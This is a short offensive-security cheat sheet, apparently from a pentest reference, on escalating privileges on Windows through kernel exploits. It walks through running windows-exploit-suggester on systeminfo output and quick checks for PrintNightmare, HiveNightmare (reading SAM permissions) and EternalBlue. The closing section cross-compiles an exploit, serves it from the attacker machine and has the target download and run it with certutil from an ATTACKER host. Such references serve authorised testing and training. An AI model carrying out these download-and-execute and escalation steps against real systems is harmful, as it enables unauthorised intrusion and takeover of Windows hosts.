KERNEL EXPLOITS
windows-exploit-suggester
Match OS/patches to exploits — Run on attacker machine
systeminfo > sysinfo.txt
python3 wes.py sysinfo.txt
Example Output
python3 wes.py sysinfo.txt
[E] MS17-010: EternalBlue
Affected: Windows Server 2016
KB: KB4013389 (NOT installed)
[E] CVE-2021-1732: Win32k Elevation
Affected: Windows 10/Server 2019
[M] CVE-2020-0787: BITS Elevation
Affected: All Windows versions
(Cross-reference with installed hotfixes)
Check for common CVEs
Quick manual check — Based on OS version
PrintNightmare (CVE-2021-34527)
HiveNightmare (CVE-2021-36934)
EternalBlue (MS17-010)
MS16-032 (Secondary Logon)
Example Output
PrintNightmare (CVE-2021-1675):
Get-Service Spooler -> Running = potentially vulnerable
HiveNightmare (CVE-2021-36934):
icacls C:\Windows\System32\config\SAM -> BUILTIN\Users:(I)(RX) = vulnerable!
EternalBlue (MS17-010):
nmap --script smb-vuln-ms17-010 -p 445 target
(Check each based on OS version)
Compile and transfer exploit
Match architecture — x86 vs x64 matters
Cross-compile or use pre-compiled binaries from GitHub
Example Output
On attacker:
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe
python3 -m http.server 80
On target:
certutil -urlcache -split -f http://ATTACKER/exploit.exe C:\temp\exploit.exe
C:\temp\exploit.exe
(Cross-compile Windows exploits on Linux)